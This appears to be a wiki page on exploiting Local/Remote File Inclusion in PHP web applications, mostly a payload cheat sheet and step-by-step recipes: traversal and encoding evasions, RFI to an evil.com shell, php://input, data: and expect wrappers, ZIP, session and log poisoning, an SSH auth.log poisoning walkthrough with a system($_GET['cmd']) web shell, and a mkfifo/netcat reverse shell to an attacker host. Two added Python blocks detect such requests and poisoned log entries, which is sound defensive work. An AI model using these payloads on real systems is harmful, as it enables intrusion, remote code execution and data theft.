Difference between revisions of "Exploiting Local/Remove File Inclusion"

Latest revision as of 15:59, 22 May 2018

What is LFI / RFI?

A Local/Remote File Inclusion (LFI/RFI) vulnerability allows an attacker to exploit a dynamic file inclusion mechanism of a web application to access files outside the intended scope.

LFI / RFI Cheat Sheet

http://example.com/index.php?page=../../../etc/passwd
http://example.com/index.php?page=../../../etc/passwd%00
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
http://example.com/index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\.
http://example.com/index.php?page=../../../../[…]../../../../../etc/passwd
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=http://evil.com/shell.txt
http://example.com/index.php?page=http://evil.com/shell.txt%00
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
http://example.com/index.php?page=php:expect://id
http://example.com/index.php?page=php:expect://ls
http://example.com/index.php?page=path/to/uploaded/file.png
http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+
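
Most of the entries above exist to slip past a naive substring check, so a detector or input filter has to canonicalise before it matches. The following Python is an added example, not part of the original cheat sheet: it undoes repeated URL decoding, lowercases, and collapses slash and dot runs before looking for traversal, null bytes and stream wrappers, and runs over a constructed list of request targets (SAMPLE_REQUESTS is made up here, modelled on the list above).

```python
import re
from urllib.parse import unquote
# Constructed request targets (not real traffic) mirroring the cheat-sheet evasions:
# null byte, double URL encoding, '....//', slash padding, mixed-case wrapper names.
SAMPLE_REQUESTS = [
    "/index.php?page=about",
    "/index.php?page=../../../etc/passwd%00",
    "/index.php?page=%252e%252e%252fetc%252fpasswd",
    "/index.php?page=....//....//etc/passwd",
    "/index.php?page=..///////..////..//////etc/passwd",
    "/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php",
    "/index.php?page=zip://shell.jpg%23payload.php",
    "/index.php?page=http://evil.com/shell.txt",
]

# Stream wrappers that user input should never be able to hand to include().
WRAPPER_RE = re.compile(r"^(php|zip|phar|data|expect|glob|file|https?|ftps?):")

def normalize(value, rounds=3):
    """Undo repeated URL encoding, lowercase, then collapse slash runs and
    long dot runs so '%252e%252e%252f', '....//' and '..////' all read '../'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = value.replace("\\", "/").lower()
    value = re.sub(r"/+", "/", value)
    return re.sub(r"\.{3,}", "..", value)

def classify(target):
    """Return (parameter, indicator) pairs found in one request target's query."""
    _, _, query = target.partition("?")
    findings = []
    for param in query.split("&"):
        name, _, raw = param.partition("=")
        value = normalize(raw)
        if "\x00" in value:
            findings.append((name, "null-byte"))
        if "../" in value:
            findings.append((name, "traversal"))
        wrapper = WRAPPER_RE.match(value)
        if wrapper:
            findings.append((name, "wrapper:" + wrapper.group(1)))
    return findings

def scan(targets):
    """Map each target that carries at least one indicator to its findings."""
    return {t: classify(t) for t in targets if classify(t)}
```

The same normalisation is what an allowlist in the application should apply before comparing the page parameter against known names; matching the raw value is what lets the double-encoded and dot-padded variants through.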

Exploit LFI through ZIP

Create a PHP payload (e.g. system($_GET['cmd'])), zip it, and mask the archive as a file with a different, acceptable extension:

zip payload.zip payload.php
mv payload.zip shell.jpg
rm payload.php

Execute

http://example.com/index.php?page=zip://shell.jpg%23payload.php

Exploit LFI / RCE via input://

http://example.com/index.php?page=php://input
DATA: <? system('whoami'); ?>

Exploit LFI / RCE via PHP Session

Check whether the website uses PHP sessions (a PHPSESSID cookie):

Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Mon, 13-April-2018 00:21:29 EDT; path=/; httponly

In PHP 5 these sessions are stored in /var/lib/php5/sess_[PHPSESSID]

Inject your command into a cookie:

login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php

And include it

http://example.com/index.php?page=file=/../../../../../../../../../var/lib/php5/sess_978a69sdf76987er6zdfa

Exploit LFI / RCE via Log file

Get PHP appended to a log file the web server can read (use your imagination here); common candidates:

http://example.com/index.php?page=/var/log/apache/access.log
http://example.com/index.php?page=/var/log/apache/error.log
http://example.com/index.php?page=/var/log/vsftpd.log
http://example.com/index.php?page=/var/log/sshd.log

And include it

http://example.com/index.php?page=/var/log/apache/access.log

Exploit RFI wrapping DATA with "" payload

http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=

Exploit RFI through EXPECT

http://example.com/index.php?page=php:expect://id
http://example.com/index.php?page=php:expect://ls

Example: RCE through LFI via SSH Log Poisoning

Let's assume your target system is running a flavour of Debian (Ubuntu) where login attempts are logged to auth.log and said file is accessible via LFI, e.g.

# curl -v -s -G --data-urlencode file=/var/log/auth.log http://192.168.56.106 |grep logind
...
May 9 04:54:33 hostname  systemd-login[782]: New seat seat0
...

Good, we can read the log. Now let's try injecting some PHP into the log. The code will execute a remote command and render its output as part of the response.

A word of caution: you have to be very careful here, as improperly formatted PHP will break the log in a way that you won't be able to load it any more. If you're planning on injecting a large amount of data, perhaps create a bunch of temp files under /tmp and work with those instead, keeping auth.log as a fall-back.

The quickest and shortest way to pass arbitrary commands to PHP would be via a system() call, which can be injected into auth.log as follows:

# ssh '<? system($_GET['cmd']); ?>'@192.168.56.106

Now if you browse the same URL again, passing a command like ls, you'll see the output of the command as part of the response:

# curl -v -s -G --data-urlencode file=/var/log/auth.log --data-urlencode "cmd=ls -altr" http://192.168.56.106 |less
...
-rw-r--r--   1 www-data  root 42K  Mar 5 09:33 index.php
-rw-r--r--   1 www-data  root 3.1K Mar 5 09:35 about.php
-rw-r--r--   1 www-data  root 89   Mar 5 09:36 _super_secret_file.txt
...
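
From the defender's side, the poisoned entry is visible in auth.log long before anyone requests the include, because sshd faithfully records the bogus username. The following Python is an added example, not part of the original walkthrough: it scans a constructed auth.log excerpt (the lines, hostnames and IPs are made up) for sshd entries whose attacker-controlled fields carry PHP markers and reports the source addresses.

```python
import re

# Constructed auth.log excerpt (not a real capture). Lines 3 and 4 show the
# kind of username the SSH log-poisoning walkthrough above leaves behind.
SAMPLE_AUTH_LOG = """\
May  9 04:54:33 hostname systemd-logind[782]: New seat seat0.
May  9 04:55:10 hostname sshd[801]: Failed password for invalid user bob from 10.0.0.7 port 50122 ssh2
May  9 04:55:41 hostname sshd[803]: Invalid user <? system($_GET['cmd']); ?> from 192.168.56.200
May  9 04:55:41 hostname sshd[803]: Failed password for invalid user <? system($_GET['cmd']); ?> from 192.168.56.200 port 49714 ssh2
May  9 04:56:02 hostname sshd[805]: Accepted publickey for alice from 10.0.0.9 port 50201 ssh2
"""

# PHP tags, dangerous calls or superglobals have no business in a username.
PHP_MARKERS = re.compile(
    r"<\?(php|=)?|\?>|\b(system|exec|passthru|shell_exec|popen|eval)\s*\(|\$_(GET|POST|REQUEST|COOKIE)",
    re.I,
)
SSHD_LINE = re.compile(r"^\w{3}\s+\d+ \d\d:\d\d:\d\d \S+ sshd\[\d+\]: (?P<msg>.*)$")
SRC_IP = re.compile(r"\bfrom (\d{1,3}(?:\.\d{1,3}){3})\b")

def find_poisoned(log_text):
    """Return (line_no, source_ip, marker) for every sshd line whose
    attacker-controlled fields carry PHP code markers."""
    hits = []
    for no, line in enumerate(log_text.splitlines(), start=1):
        m = SSHD_LINE.match(line)
        if not m:
            continue
        marker = PHP_MARKERS.search(m.group("msg"))
        if marker:
            ip = SRC_IP.search(m.group("msg"))
            hits.append((no, ip.group(1) if ip else None, marker.group(0)))
    return hits

def sources(hits):
    """Distinct source IPs from the hits, in first-seen order, for blocking or triage."""
    seen = []
    for _, ip, _ in hits:
        if ip and ip not in seen:
            seen.append(ip)
    return seen
```

Pairing a hit here with a subsequent web request for auth.log (see the first example's scan of request targets) is the combination that turns a noisy brute-force alert into a high-confidence LFI-to-RCE detection.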

Dropping into a system shell

While it might sound very tempting, dropping into a shell is not always the best idea, as it will immediately show up in the list of running processes and might be picked up by an IDS (Intrusion Detection System) that monitors certain files and processes, or by anyone who may be keeping an eye on that host, and may trigger Incident Response.

For the sake of CTF, however, this is not a big deal so let's do this!

Term 1: Start nc in listening mode

root@kali:~# nc -vvvlt -p 4444
listening on [any] 4444 ...

Term 2: Execute remote shell command

root@kali:~# curl -G --data-urlencode file=/var/log/auth.log --data-urlencode "cmd=rm -f /tmp/backpipe; mkfifo /tmp/backpipe; cat /tmp/backpipe | /bin/sh -i 2>&1|nc 192.168.56.200 4444 >/tmp/backpipe" http://192.168.56.106

Term 1: Acknowledge the reverse shell connection and spawn a new tty so we can interact with it properly

root@kali:~ # nc -vvvlt -p 4444
listening on [any] 4444 ...
connect to [192.168.56.200] from robot [192.168.56.108] 49714
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/bash")'

daemon@linux:/var/www $

EOF